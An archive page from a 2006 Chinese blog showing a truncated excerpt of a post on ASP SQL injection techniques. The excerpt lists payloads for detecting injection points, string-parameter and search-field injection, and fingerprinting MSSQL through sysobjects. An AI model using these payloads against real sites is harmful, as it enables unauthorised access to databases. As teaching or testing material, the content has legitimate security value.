日归档:
2006年05月08日
| 记录数: 1
-
- 全面认识ASP注入技巧
- Weather:晴 ,东南风 4-5级 ,最高气温18 ℃
- 2006-05-08
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.注入参数是字符
'and [查询条件] and ''='
4.搜索时没过滤参数的
'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from...- Views(4444) | Comments(0) | In web develop
